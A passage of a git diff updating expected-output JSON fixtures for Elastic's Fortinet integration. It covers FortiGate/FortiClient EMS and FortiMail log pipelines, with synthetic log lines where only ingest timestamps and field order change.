MAC_FCTEMS0000011111_Connected-to-EMS.", "event": { "start": "2021-05-07T08:31:14.880+01:00", - "ingested": "2021-12-09T13:37:22.358010500Z", + "ingested": "2021-12-14T14:43:01.495921728Z", "original": "\u003c190\u003edevname=\"firewall\" devid=\"FG201EEF34CD12AB\" vd=\"root\" date=2021-05-07 time=08:31:14 eventtime=1620372674880784143 tz=\"+0100\" logid=\"0112053203\" type=\"event\" subtype=\"connector\" level=\"information\" logdesc=\"Dynamic address updated\" fctemssn=\"FCTEMS0000011111\" addr=\"MAC_FCTEMS0000011111_Connected-to-EMS\" msg=\"Updated tag MAC_FCTEMS0000011111_Connected-to-EMS.\"", "code": "0112053203", "timezone": "+0100", "kind": "event" }, + "message": "Updated tag MAC_FCTEMS0000011111_Connected-to-EMS.", "tags": [ "preserve_original_event" ] @@ -2796,15 +3120,15 @@ "rule": { "description": "Dynamic address updated" }, - "message": "Updated tag FCTEMS0000011111_AV-Running.", "event": { "start": "2021-05-07T08:31:14.900+01:00", - "ingested": "2021-12-09T13:37:22.358016200Z", + "ingested": "2021-12-14T14:43:01.495922139Z", "original": "\u003c190\u003edevname=\"firewall\" devid=\"FG201EAB12CD34EF\" vd=\"root\" date=2021-05-07 time=08:31:14 eventtime=1620372674900027938 tz=\"+0100\" logid=\"0112053203\" type=\"event\" subtype=\"connector\" level=\"information\" logdesc=\"Dynamic address updated\" fctemssn=\"(null)\" addr=\"FCTEMS0000011111_AV-Running\" msg=\"Updated tag FCTEMS0000011111_AV-Running.\"", "code": "0112053203", "timezone": "+0100", "kind": "event" }, + "message": "Updated tag FCTEMS0000011111_AV-Running.", "tags": [ "preserve_original_event" ] @@ -2836,15 +3160,15 @@ "rule": { "description": "Dynamic address updated" }, - "message": "Updated tag MAC_FCTEMS0000011111_AV-Running.", "event": { "start": "2021-05-07T08:31:14.900+01:00", - "ingested": "2021-12-09T13:37:22.358023800Z", + "ingested": "2021-12-14T14:43:01.495922528Z", "original": "\u003c190\u003edevname=\"firewall\" devid=\"FG201EAB12CD34EF\" vd=\"root\" date=2021-05-07 time=08:31:14 eventtime=1620372674900167367 tz=\"+0100\" logid=\"0112053203\" type=\"event\" subtype=\"connector\" level=\"information\" logdesc=\"Dynamic address updated\" fctemssn=\"(null)\" addr=\"MAC_FCTEMS0000011111_AV-Running\" msg=\"Updated tag MAC_FCTEMS0000011111_AV-Running.\"", "code": "0112053203", "timezone": "+0100", "kind": "event" }, + "message": "Updated tag MAC_FCTEMS0000011111_AV-Running.", "tags": [ "preserve_original_event" ] @@ -2876,15 +3200,15 @@ "rule": { "description": "Dynamic address updated" }, - "message": "Updated tag FCTEMS0000011111_Connected-to-EMS.", "event": { "start": "2021-05-07T08:31:14.900+01:00", - "ingested": "2021-12-09T13:37:22.358027300Z", + "ingested": "2021-12-14T14:43:01.495922924Z", "original": "\u003c190\u003edevname=\"firewall\" devid=\"FG201EAB12CD34EF\" vd=\"root\" date=2021-05-07 time=08:31:14 eventtime=1620372674900749585 tz=\"+0100\" logid=\"0112053203\" type=\"event\" subtype=\"connector\" level=\"information\" logdesc=\"Dynamic address updated\" fctemssn=\"(null)\" addr=\"FCTEMS0000011111_Connected-to-EMS\" msg=\"Updated tag FCTEMS0000011111_Connected-to-EMS.\"", "code": "0112053203", "timezone": "+0100", "kind": "event" }, + "message": "Updated tag FCTEMS0000011111_Connected-to-EMS.", "tags": [ "preserve_original_event" ] @@ -2916,15 +3240,15 @@ "rule": { "description": "Dynamic address updated" }, - "message": "Updated tag MAC_FCTEMS0000011111_Connected-to-EMS.", "event": { "start": "2021-05-07T08:31:14.900+01:00", - "ingested": "2021-12-09T13:37:22.358032Z", + "ingested": "2021-12-14T14:43:01.495923314Z", "original": "\u003c190\u003edevname=\"firewall\" devid=\"FG201EAB12CD34EF\" vd=\"root\" date=2021-05-07 time=08:31:14 eventtime=1620372674900961834 tz=\"+0100\" logid=\"0112053203\" type=\"event\" subtype=\"connector\" level=\"information\" logdesc=\"Dynamic address updated\" fctemssn=\"(null)\" addr=\"MAC_FCTEMS0000011111_Connected-to-EMS\" msg=\"Updated tag MAC_FCTEMS0000011111_Connected-to-EMS.\"", "code": "0112053203", "timezone": "+0100", "kind": "event" }, + "message": "Updated tag MAC_FCTEMS0000011111_Connected-to-EMS.", "tags": [ "preserve_original_event" ] diff --git a/packages/fortinet/data_stream/fortimail/_dev/test/pipeline/test-generated.log-expected.json b/packages/fortinet/data_stream/fortimail/_dev/test/pipeline/test-generated.log-expected.json index db1073d9162..43c00645324 100644 --- a/packages/fortinet/data_stream/fortimail/_dev/test/pipeline/test-generated.log-expected.json +++ b/packages/fortinet/data_stream/fortimail/_dev/test/pipeline/test-generated.log-expected.json @@ -1,1200 +1,1200 @@ { "expected": [ { - "ecs": { - "version": "1.12.0" - }, "message": "date=2016-1-29 time=06:09:59 device_id=pexe log_id=nes log_part=eab type=event subtype=update pri=high msg=\"boNemoe\"", "event": { - "ingested": "2021-12-09T13:37:30.095994800Z" + "ingested": "2021-12-14T14:43:09.749021788Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2016-2-12 time=13:12:33 device_id=ehend log_id=ritquiin log_part=umqui type=virus subtype=infected pri=very-high from=\"mest\" to=enderitq client_name=\"sperna884.internal.domain\" client_ip=\"10.165.201.71\" session_id=\"pisciv\" msg=\"uii\"", "event": { - "ingested": "2021-12-09T13:37:30.096004200Z" + "ingested": "2021-12-14T14:43:09.749024414Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2016-2-26 time=20:15:08 device_id=doeiu log_id=nia log_part=olupt type=event subtype=config pri=low user=quipexe ui=alo(10.212.18.145) module=umdo submodule=itessequ msg=vol", "event": { - "ingested": "2021-12-09T13:37:30.096010600Z" + "ingested": "2021-12-14T14:43:09.749024885Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2016-3-12 time=03:17:42 device_id=uipexea log_id=tatio log_part=minim type=event subtype=pop3 pri=high user=ceroinBC ui=ratvolup action=deny status=iatu msg=\"ionofde\"", "event": { - "ingested": "2021-12-09T13:37:30.096016700Z" + "ingested": "2021-12-14T14:43:09.749025309Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2016-3-26 time=10:20:16 device_id=itati log_id=mfu log_part=uid type=event subtype=pop3 pri=very-high user=obeataev ui=lor action=block status=autfu msg=\"natura\"", "event": { - "ingested": "2021-12-09T13:37:30.096022700Z" + "ingested": "2021-12-14T14:43:09.749025720Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2016-4-9 time=17:22:51 device_id=llamcorp log_id=ari log_part=eataevit type=event subtype=system pri=high user=iam ui=mqua action=allow status=olab msg=mquisnos", "event": { - "ingested": "2021-12-09T13:37:30.096028800Z" + "ingested": "2021-12-14T14:43:09.749026123Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2016-4-24 time=00:25:25 device_id=enimad log_id=incididu log_part=eci type=virus pri=very-high from=tenbyCic to=boree src=10.98.69.43 session_id=\"iinea\" msg=ipit", "event": { - "ingested": "2021-12-09T13:37:30.096034900Z" + "ingested": "2021-12-14T14:43:09.749026502Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2016-5-8 time=07:27:59 device_id=taliqu log_id=temUten log_part=ccusan type=virus subtype=infected pri=low from=\"Ciceroi\" to=\"aveniam\" client_name=\"uradi7307.internal.corp\" client_ip=\"10.118.96.139\" session_id=\"sitas\" msg=ehenderi", "event": { - "ingested": "2021-12-09T13:37:30.096041Z" + "ingested": "2021-12-14T14:43:09.749026884Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2016-5-22 time=14:30:33 device_id=smo log_id=litessec log_part=emporinc type=event subtype=pop3 pri=very-high user=ipsumq ui=atcu action=allow status=tessec msg=\"remipsum\"", "event": { - "ingested": "2021-12-09T13:37:30.096047Z" + "ingested": "2021-12-14T14:43:09.749027280Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2016-6-5 time=21:33:08 device_id=ntutl log_id=caecatc log_part=onsequat type=event subtype=update pri=low msg=\"edquiano\"", "event": { - "ingested": "2021-12-09T13:37:30.096053Z" + "ingested": "2021-12-14T14:43:09.749027661Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2016-6-20 time=04:35:42 device_id=idestla log_id=Nemoeni log_part=uradi type=statistics pri=very-high session_id=\"lup\" from=\"remeumf\" mailer=antiumto client_name=\"10.241.165.37\" MSISDN=aUteni resolved=ittenbyC to=\"aperi\" direction=\"inbound\" message_length=ita virus=\"ipi\" disposition=rsitamet classifier=\"lupt\" subject=\"xea\"", "event": { - "ingested": "2021-12-09T13:37:30.096059100Z" + "ingested": "2021-12-14T14:43:09.749028055Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2016-7-4 time=11:38:16 device_id=amvolup log_id=sequi log_part=rehend type=event subtype=webmail pri=high user=eme ui=numqu(10.232.149.140) action=allow status=lum msg=utali", "event": { - "ingested": "2021-12-09T13:37:30.096067700Z" + "ingested": "2021-12-14T14:43:09.749028659Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2016-7-18 time=18:40:50 device_id=estiae log_id=sci log_part=oei type=virus_file-signature pri=low snostrud to=nama src=\"10.24.67.250\" session_id=\"dolor\" msg=\"nnum\"", "event": { - "ingested": "2021-12-09T13:37:30.096074Z" + "ingested": "2021-12-14T14:43:09.749029074Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2016-8-2 time=01:43:25 device_id=oluptas log_id=tNequepo log_part=lup type=event subtype=update pri=medium msg=equat", "event": { - "ingested": "2021-12-09T13:37:30.096080Z" + "ingested": "2021-12-14T14:43:09.749029468Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2016-8-16 time=08:45:59 device_id=abi log_id=sectetur log_part=uioffi type=event subtype=update pri=high msg=veniamq", "event": { - "ingested": "2021-12-09T13:37:30.096086100Z" + "ingested": "2021-12-14T14:43:09.749029855Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2016-8-30 time=15:48:33 device_id=orem log_id=beata log_part=hitecto type=statistics pri=very-high session_id=\"texp\" client_name=\"[10.179.124.125]\"dst_ip=\"10.177.36.38\" from=\"sequine\" to=\"ectio\" polid=\"dutper\" domain=\"lamcolab3252.www.invalid\" subject=\"gel\" mailer=\"lorsitam\" resolved=\"mpo\" direction=\"inbound\" virus=\"ris\" disposition=\"uamqu\" classifier=\"lor\" message_length=oide", "event": { - "ingested": "2021-12-09T13:37:30.096092300Z" + "ingested": "2021-12-14T14:43:09.749030259Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2016-9-13 time=22:51:07 device_id=didunt log_id=uptatema log_part=intocc type=virus subtype=file-signature pri=very-high from=\"orema\" to=invento src=[10.164.39.248] session_id=\"nofdeFin\" msg=sequam", "event": { - "ingested": "2021-12-09T13:37:30.096096900Z" + "ingested": "2021-12-14T14:43:09.749030757Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2016-9-28 time=05:53:42 device_id=tvolu log_id=ecte log_part=tinvolu type=virus_file-signature pri=high from=\"ntiumdo\" to=\"autfu\" src=gnaaliq [10.52.135.156] session_id=\"litse\" msg=\"icabo\"", "event": { - "ingested": "2021-12-09T13:37:30.096101900Z" + "ingested": "2021-12-14T14:43:09.749031156Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2016-10-12 time=12:56:16 device_id=stru log_id=tectobe log_part=Nequepo type=event subtype=config pri=very-high user=pora ui=boree module=evolup submodule=ionofdeF msg=\"evelit\"", "event": { - "ingested": "2021-12-09T13:37:30.096107700Z" + "ingested": "2021-12-14T14:43:09.749031544Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2016-10-26 time=19:58:50 device_id=uatD log_id=ariatu log_part=edquiac type=event subtype=smtp pri=high user=atno ui=tani action=allow status=ntocca session_id=ostru log_part=ntoccae msg=autf", "event": { - "ingested": "2021-12-09T13:37:30.096113Z" + "ingested": "2021-12-14T14:43:09.749031925Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2016-11-10 time=03:01:24 device_id=tenimad log_id=minimav log_part=udexerci type=spam pri=very-high session_id=\"itam\" client_name=\"str976.internal.localhost [10.166.225.26]\" from=tanimid to=umdo subject=\"natuse\" msg=\"gnamal\"", "event": { - "ingested": "2021-12-09T13:37:30.096117400Z" + "ingested": "2021-12-14T14:43:09.749032302Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2016-11-24 time=10:03:59 device_id=intoc log_id=rQuisau log_part=itess type=virus subtype=infected pri=high from=evit to=\"runtm\" client_name=\"molli4306.www5.home\" client_ip=\"10.218.243.47\" session_id=\"borios\" msg=rsitvolu", "event": { - "ingested": "2021-12-09T13:37:30.096122400Z" + "ingested": "2021-12-14T14:43:09.749032688Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2016-12-8 time=17:06:33 device_id=quamqua log_id=eacommod log_part=ctetura type=event subtype=imap pri=high user=tpersp ui=stla action=allow status=sequamni msg=uradi", "event": { - "ingested": "2021-12-09T13:37:30.096128600Z" + "ingested": "2021-12-14T14:43:09.749033063Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2016-12-23 time=00:09:07 device_id=dolore log_id=onsecte log_part=nBCSedut type=virus subtype=file-signature pri=high from=\"modocons\" to=gitsed src=\"10.16.177.212\" session_id=\"emp\" msg=\"Attachment file (pisciv) has sha1 hash value: lumdolor\"", "event": { - "ingested": "2021-12-09T13:37:30.096133200Z" + "ingested": "2021-12-14T14:43:09.749033557Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2017-1-6 time=07:11:41 device_id=uaUten log_id=nby log_part=mve type=event subtype=config pri=low user=isau ui=rautodi(10.96.97.81) module=pis submodule=nsequat msg=doloreme", "event": { - "ingested": "2021-12-09T13:37:30.096137900Z" + "ingested": "2021-12-14T14:43:09.749033936Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2017-1-20 time=14:14:16 device_id=aec log_id=fdeF log_part=iquidexe type=spam pri=low session_id=\"niamq\" client_name= \"lapariat7287.internal.host\" client_ip=\"10.140.7.83\" dst_ip=\"10.68.246.187\" from=\"icabo\" to=\"gna\" subject=\"con\" msg=\"preh\"", "event": { - "ingested": "2021-12-09T13:37:30.096141700Z" + "ingested": "2021-12-14T14:43:09.749034335Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2017-2-3 time=21:16:50 device_id=amcor log_id=ica log_part=lillum type=event subtype=admin pri=very-high user=dicta ui=taedicta action=accept status=poriss reason=failure msg=equaturv", "event": { - "ingested": "2021-12-09T13:37:30.096146500Z" + "ingested": "2021-12-14T14:43:09.749034740Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2017-2-18 time=04:19:24 device_id=tpersp log_id=llamc log_part=nte type=event subtype=pop3 pri=very-high user=utali ui=porinc(10.48.204.44) action=accept status=dat msg=aincidu", "event": { - "ingested": "2021-12-09T13:37:30.096152900Z" + "ingested": "2021-12-14T14:43:09.749035125Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2017-3-4 time=11:21:59 device_id=dipisci log_id=spernatu log_part=admi type=event subtype=pop3 pri=very-high user=quunt ui=olori action=allow status=autodit msg=elit", "event": { - "ingested": "2021-12-09T13:37:30.096159100Z" + "ingested": "2021-12-14T14:43:09.749035519Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2017-3-18 time=18:24:33 device_id=nte log_id=ulpa log_part=sitam type=virus subtype=file-signature pri=low enderit to=sequa src=\"[10.111.233.194]\" session_id=eirure msg=deserun", "event": { - "ingested": "2021-12-09T13:37:30.096165200Z" + "ingested": "2021-12-14T14:43:09.749035909Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2017-4-2 time=01:27:07 device_id=ptateve log_id=enderi log_part=ptatem type=event subtype=smtp pri=very-high user=fugi ui=labo action=block status=ullamcor session_id=itationu msg=proident", "event": { - "ingested": "2021-12-09T13:37:30.096171200Z" + "ingested": "2021-12-14T14:43:09.749036301Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2017-4-16 time=08:29:41 device_id=atione log_id=lores log_part=ritati type=statistics pri=very-high session_id=uii client_name=estl5804.internal.local client_ip=10.73.207.70 dst_ip=10.179.210.218 from=taut hfrom=tanimi to=rumSecti polid=iuntNe domain=atise3421.www5.localdomain mailer=oluptas resolved=emvele src_type=isnost direction=inbound virus=Sedut disposition=yCiceroi classifier=quunt message_length=acommod subject=sitvol", "event": { - "ingested": "2021-12-09T13:37:30.096177200Z" + "ingested": "2021-12-14T14:43:09.749036686Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2017-4-30 time=15:32:16 device_id=liquide log_id=odt log_part=Sedutpe type=event subtype=admin pri=medium user=rroq ui=rcit(10.43.62.246) action=accept status=estl reason=success msg=citatio", "event": { - "ingested": "2021-12-09T13:37:30.096183300Z" + "ingested": "2021-12-14T14:43:09.749037085Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2017-5-14 time=22:34:50 device_id=taedict log_id=edquian log_part=loremeu type=event subtype=admin pri=very-high user=volupta ui=dmi action=allow status=aaliq reason=unknown msg=lupta", "event": { - "ingested": "2021-12-09T13:37:30.096189400Z" + "ingested": "2021-12-14T14:43:09.749037477Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2017-5-29 time=05:37:24 device_id=occ log_id=oloreseo log_part=iruredol type=virus subtype=file-signature pri=very-high derit to=orese src=\"[10.28.105.124]\" session_id=\"strude\" msg=eritin", "event": { - "ingested": "2021-12-09T13:37:30.096195600Z" + "ingested": "2021-12-14T14:43:09.749037986Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2017-6-12 time=12:39:58 device_id=temUten log_id=dutper log_part=sitamet type=event subtype=admin pri=very-high user=illumqui ui=saq action=block status=ritqu reason=unknown msg=\"idolor\"", "event": { - "ingested": "2021-12-09T13:37:30.096201700Z" + "ingested": "2021-12-14T14:43:09.749038378Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2017-6-26 time=19:42:33 device_id=quide log_id=quaU log_part=undeomni type=virus_file-signature pri=medium acomm to=iutali src=\"[10.219.13.150]\" session_id=Finibus msg=radi", "event": { - "ingested": "2021-12-09T13:37:30.096207700Z" + "ingested": "2021-12-14T14:43:09.749038789Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2017-7-11 time=02:45:07 device_id=inrepr log_id=mol log_part=umdolors type=event subtype=pop3 pri=medium user=imad ui=oriosam(10.163.114.215) action=deny status=sitametc msg=onsequa", "event": { - "ingested": "2021-12-09T13:37:30.096213900Z" + "ingested": "2021-12-14T14:43:09.749039175Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2017-7-25 time=09:47:41 device_id=riosa log_id=tNe log_part=pisc type=event subtype=webmail pri=very-high user=caecat ui=rautod(10.124.32.120) action=accept status=atcupi msg=atem", "event": { - "ingested": "2021-12-09T13:37:30.096220100Z" + "ingested": "2021-12-14T14:43:09.749039559Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2017-8-8 time=16:50:15 device_id=undeom log_id=emullamc log_part=tec type=event subtype=imap pri=medium user=eetdo ui=tlab action=cancel status=liq msg=seddoeiu", "event": { - "ingested": "2021-12-09T13:37:30.096226200Z" + "ingested": "2021-12-14T14:43:09.749039945Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2017-8-22 time=23:52:50 device_id=edictasu log_id=mdolors log_part=oremi type=event subtype=imap pri=medium user=atis ui=atDuis action=accept status=nisiut msg=\"rumwri\"", "event": { - "ingested": "2021-12-09T13:37:30.096232300Z" + "ingested": "2021-12-14T14:43:09.749040339Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2017-9-6 time=06:55:24 device_id=lumqu log_id=onulamco log_part=ons type=event subtype=pop3 pri=low user=uptat ui=unt action=accept status=uido msg=tla", "event": { - "ingested": "2021-12-09T13:37:30.096238400Z" + "ingested": "2021-12-14T14:43:09.749040723Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2017-9-20 time=13:57:58 device_id=uamqu log_id=olori log_part=ido type=spam pri=low session_id=\"sunt\" from=\"autfugit\" to=\"emUte\" msg=iusmodi", "event": { - "ingested": "2021-12-09T13:37:30.096242900Z" + "ingested": "2021-12-14T14:43:09.749041107Z" }, - "tags": [ + "ecs": { + "version": "1.12.0" + }, + "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2017-10-4 time=21:00:32 device_id=umS log_id=iciadese log_part=riatur type=event subtype=webmail pri=very-high user=xeacommo ui=Cicero(10.247.53.179) action=cancel status=ditau msg=atemaccu", "event": { - "ingested": "2021-12-09T13:37:30.096247900Z" + "ingested": "2021-12-14T14:43:09.749041482Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2017-10-19 time=04:03:07 device_id=urau log_id=etur log_part=rsitvol type=event subtype=config pri=low user=laborum ui=ostr(10.70.91.185) module=lumdo submodule=acom msg=\"eFini\"", "event": { - "ingested": "2021-12-09T13:37:30.096253500Z" + "ingested": "2021-12-14T14:43:09.749041873Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2017-11-2 time=11:05:41 device_id=upta log_id=itessequ log_part=iusmodit type=event subtype=update pri=very-high msg=exerci", "event": { - "ingested": "2021-12-09T13:37:30.096258800Z" + "ingested": "2021-12-14T14:43:09.749042262Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2017-11-16 time=18:08:15 device_id=mmodoco log_id=amni log_part=atnul type=event subtype=webmail pri=medium user=iquidexe ui=illumq(10.215.65.52) action=accept status=tasnul msg=\"tuserr\"", "event": { - "ingested": "2021-12-09T13:37:30.096263Z" + "ingested": "2021-12-14T14:43:09.749042664Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2017-12-1 time=01:10:49 device_id=porinc log_id=riame log_part=riat type=event subtype=admin pri=medium user=rumSec ui=orp action=deny status=udan reason=unknown msg=\"essequam\"", "event": { - "ingested": "2021-12-09T13:37:30.096268100Z" + "ingested": "2021-12-14T14:43:09.749043049Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2017-12-15 time=08:13:24 device_id=itse log_id=ilm log_part=mvel type=virus subtype=infected pri=high from=seos to=exercita client_name=\"edolori3822.api.home\" client_ip=\"10.63.177.46\" session_id=\"oluptate\" msg=lit", "event": { - "ingested": "2021-12-09T13:37:30.096274400Z" + "ingested": "2021-12-14T14:43:09.749043431Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2017-12-29 time=15:15:58 device_id=iciade log_id=uis log_part=amc type=event subtype=webmail pri=medium user=Ute ui=ptassita action=allow status=runtm msg=\"eturadip\"", "event": { - "ingested": "2021-12-09T13:37:30.096279Z" + "ingested": "2021-12-14T14:43:09.749043811Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2018-1-12 time=22:18:32 device_id=colabori log_id=imidestl log_part=piscing type=virus subtype=file-signature pri=high from=\"isn\" to=smod src=\"idunt [10.29.120.226]\" session_id=\"atev\" msg=\"ectio\"", "event": { - "ingested": "2021-12-09T13:37:30.096283500Z" + "ingested": "2021-12-14T14:43:09.749044330Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2018-1-27 time=05:21:06 device_id=atcupid log_id=onse log_part=psa type=virus_file-signature pri=high destla to=\"fugitse\" src=[10.12.86.130] session_id=dese msg=\"Attachment file (duntutla) has sha1 hash value: lamco\"", "event": { - "ingested": "2021-12-09T13:37:30.096287300Z" + "ingested": "2021-12-14T14:43:09.749044722Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2018-2-10 time=12:23:41 device_id=gna log_id=ici log_part=quamnih type=event subtype=pop3 pri=low user=iameaque ui=identsun action=deny status=aquio msg=\"rspicia\"", "event": { - "ingested": "2021-12-09T13:37:30.096292200Z" + "ingested": "2021-12-14T14:43:09.749045110Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2018-2-24 time=19:26:15 device_id=uiineavo log_id=sistena log_part=uidexeac type=virus subtype=infected pri=high from=\"amquisno\" to=modoc client_name=\"magnam3267.corp\" client_ip=\"10.95.32.86\" session_id=\"Bonorum\" msg=lesti", "event": { - "ingested": "2021-12-09T13:37:30.096298300Z" + "ingested": "2021-12-14T14:43:09.749045503Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2018-3-11 time=02:28:49 device_id=lupta log_id=byC log_part=imadm type=spam pri=low session_id=\"nci\" from=\"orroquis\" to=\"ulapa\" subject=\"iumdo\" msg=\"iusmodit\"", "event": { - "ingested": "2021-12-09T13:37:30.096304500Z" + "ingested": "2021-12-14T14:43:09.749045889Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2018-3-25 time=09:31:24 device_id=obeataev log_id=umf log_part=olesti type=event subtype=config pri=low user=quaeabil ui=emip module=aturQu submodule=itesse msg=\"iamqui\"", "event": { - "ingested": "2021-12-09T13:37:30.096310500Z" + "ingested": "2021-12-14T14:43:09.749046292Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2018-4-8 time=16:33:58 device_id=inim log_id=etdol log_part=Sed type=event subtype=pop3 pri=very-high user=tten ui=etur action=allow status=mipsumqu msg=\"eprehen\"", "event": { - "ingested": 